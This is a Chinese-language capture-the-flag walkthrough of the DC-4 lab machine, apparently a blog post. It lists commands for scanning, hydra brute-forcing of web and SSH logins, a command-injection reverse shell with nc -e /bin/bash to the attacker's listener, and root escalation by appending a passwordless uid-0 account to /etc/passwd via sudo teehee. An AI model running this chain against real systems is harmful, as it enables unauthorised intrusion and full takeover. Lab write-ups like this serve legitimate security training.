DC-4攻略
信息收集
主机发现
nmap -sP 192.168.64.0/24 -oN nmap.sP
发现目标主机ip为192.168.64.139
端口扫描
nmap -A 192.168.64.139 -p 1-65535 -oN nmap_A
发现80http 和22ssh
访问80
目录扫描
dirb http://192.168.64.139
后台登录主页为http://192.168.64.139/index.php
渗透
爆破web账密
发现以post方式传参到login.php
使用hydra爆破表单
hydra -l <用户名> -P <密码字典> <IP地址> <表单参数> <登录失败消息>
hydra -l admin -P pass 192.168.64.139 http-post-form "/login.php:username=^USER^&password=^PASS^:S=logout"
密码为happy
登录页面查看信息
发现页面中存在远程命令执行
远程命令执行反弹shell
bp抓包修改命令
nc 监听端口或发起tcp/udp连接
kali本地监听端口
nc -lvvp 8080
nc+192.168.64.131+8080+-e+/bin/bash 发起连接 空格用+代替
获得交互性shell
python -c 'import pty;pty.spawn("/bin/sh")' 获得交互性shell
查找信息
进入home中jim目录发现mbox权限奇怪 但是我们没权限进去
$ ls -l
ls -l
total 12
drwxr-xr-x 2 jim jim 4096 Apr 7 2019 backups
-rw------- 1 jim jim 528 Apr 6 2019 mbox
-rwsrwxrwx 1 jim jim 174 Apr 6 2019 test.sh
进入home中jim目录backups目录,发现old-passwords
推测他可能是记录的密码,保存为字典
查看用户
cat /etc/passwd
发现两个用户jim和sam
考虑ssh爆破
爆破ssh
hydra -l jim -P pass ssh://192.168.64.139 -v -f
jim密码为jibril04
ssh登录jim
ssh jim@192.168.64.138
cat mbox
发现是root发的邮件,去var/mali看一眼
cd /var/mali
cat jim
获得用户Charles密码^xHhA&hvim0y
切换到Charles用户
su Charles 发现没有用户
考虑外国人喜欢首字母大写
su charles 成功
提权
发现可以免密sudo使用teehe
charles@dc-4:/var/mail$ sudo -l
sudo -l
Matching Defaults entries for charles on dc-4:
env_reset, mail_badpass,
secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin
User charles may run the following commands on dc-4:
(root) NOPASSWD: /usr/bin/teehee
sudo提权
echo "admin::0:0:::/bin/bash" | sudo teehee -a /etc/passwd
建立无密码用户并给root权限
免密登录
su admin
cd /root
ls
cat flag.txt 通关
版权声明:本文为weixin_47311099原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。